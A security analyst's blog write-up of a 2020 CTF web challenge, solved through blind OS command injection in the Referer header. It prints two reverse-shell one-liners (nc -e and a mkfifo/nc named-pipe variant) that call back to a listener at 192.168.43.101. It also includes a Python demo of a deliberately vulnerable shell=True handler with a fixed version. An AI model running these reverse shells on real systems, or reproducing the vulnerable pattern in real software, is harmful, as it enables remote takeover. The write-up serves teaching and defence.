January 31, 2020 (2 to 3 PM)
Hi! I am Bipin Jitiya, working as a security analyst at Net Square Solutions Pvt. Ltd. In this post I am writing about a CTF that was organized as part of the NSConclave 2020 event. Unfortunately I did not play on the day of the event. Many challenges were solved by several players, but nobody was able to solve one challenge, which was later hosted as #CTFFriday.
This CTF was built by Bhargav Gajera and organized by Net Square Solutions Pvt. Ltd. and NSConclave on January 31, 2020. The following is my detailed write-up on how I solved that challenge.
The task name was WEB, and only one URL was provided. As the name suggests, a web application was hosted at that URL.
I started with the general web application testing approach: I crawled all the web pages and looked for hints in the HTML and JavaScript comments in the source code.
I also checked robots.txt for files and directories hidden from search engines, but that file did not exist on the target server. After all this analysis, I noticed a page parameter whose value changed when navigating to a different page. I quickly tested it for directory traversal using some standard payloads, but without success.
As usual, when I don't find anything, I start enumeration. This time too I launched a dictionary-based attack against the web server, brute-forcing directories and files with Burp Intruder. Obviously this can also be done with dirb or dirsearch, but some CTF challenges hide hints in the "404 Not Found" page, and dirb and dirsearch may not flag those responses. I did not want to leave any stone unturned. As a result I found a sitemap.xml file. It contained a URL entry: https://www.127.0.0.1/index.php?page=admin
When I opened that URL in the browser, it automatically redirected me to the homepage. This seemed interesting, so I intercepted the same request in Burp and started experimenting: I added extra parameters such as username and password and fuzzed them with random payloads, but to no effect.
The response contained the string "log:", so I added a new Log header with a random string as its value, but again with no effect.
After wasting a lot of time on that, I felt that the string "user requesting from" in the response might be some kind of hint.
I took "user requesting from" to mean the previous web page from which a link to the currently requested page was followed. That information is carried by the Referer request header. I quickly added a Referer request header, and its value was reflected back into the response body.
After fuzzing the Referer request header, I found that it was vulnerable to blind OS command injection. I tried to get a reverse shell by injecting the following command, with a listener waiting on 192.168.43.101 port 7171:
root@ns:~# nc -e /bin/sh 192.168.43.101 7171
It did not connect. I thought there might be a problem with nc: several netcat builds (the OpenBSD variant, for example) do not support the -e option at all, so nc -e /bin/sh never spawns anything. I remembered a post about how to get a reverse shell when the wrong version of netcat is installed, and got the shell with the following payload. It works without -e by using a named pipe: whatever nc receives is written into the FIFO, the FIFO feeds the shell's stdin, and the shell's stdout and stderr are piped back into nc:
root@ns:~# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.101 7171 >/tmp/f
It worked! I got the flag after executing some commands!
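To make the bug class concrete, here is an added Python example that is not part of the challenge or of my tooling: it simulates a server-side handler that logs the Referer header by concatenating it into a shell command (the pattern that makes header injection like the one above possible), places the hardened version beside it, and includes a time-based probe of the kind used to confirm blind command injection when the command output is never reflected. The function names, the example.test URL and the sleep delay are my assumptions; the CTF's real server-side code was never shown.

```python
import subprocess
import time

# Constructed stand-in for the challenge's "user requesting from" logging.
# Both handlers receive the raw value of the Referer request header.


def log_referer_vulnerable(referer: str) -> str:
    """Vulnerable: the header is spliced into a command string that /bin/sh
    parses, so a ';' in the header terminates the echo and starts a new
    command. Returns whatever the shell printed (not shown to a real client,
    which is what makes the injection 'blind')."""
    cmd = f"echo user requesting from {referer}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def log_referer_safe(referer: str) -> str:
    """Hardened: the header travels as a single argv element and no shell
    ever tokenises it, so ';', '|', '`' and '$(' are just characters."""
    proc = subprocess.run(
        ["echo", "user requesting from", referer],
        capture_output=True,
        text=True,
    )
    return proc.stdout


def blind_injection_probe(handler, delay: int = 1) -> bool:
    """Time-based blind injection check: if a 'sleep N' payload in the
    header delays the response by roughly N seconds, the header is being
    executed. A baseline request is timed first so that a merely slow
    handler is not reported as injectable."""
    start = time.monotonic()
    handler("http://example.test/")
    baseline = time.monotonic() - start

    start = time.monotonic()
    handler(f"http://example.test/; sleep {delay}")
    elapsed = time.monotonic() - start

    return (elapsed - baseline) >= delay * 0.8


if __name__ == "__main__":
    payload = "http://example.test/; echo INJECTED"
    print("vulnerable:", repr(log_referer_vulnerable(payload)))
    print("safe:      ", repr(log_referer_safe(payload)))
    print("probe vulnerable ->", blind_injection_probe(log_referer_vulnerable))
    print("probe safe       ->", blind_injection_probe(log_referer_safe))
```

The fix is not escaping or a blacklist of metacharacters but never handing attacker-controlled bytes to a shell at all; if a shell is genuinely required, shlex.quote on each interpolated value is the minimum, and the process should run under an account that cannot reach anything a reverse shell would be interesting for.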
Thanks for reading. Keep learning.
Stay safe and healthy 😇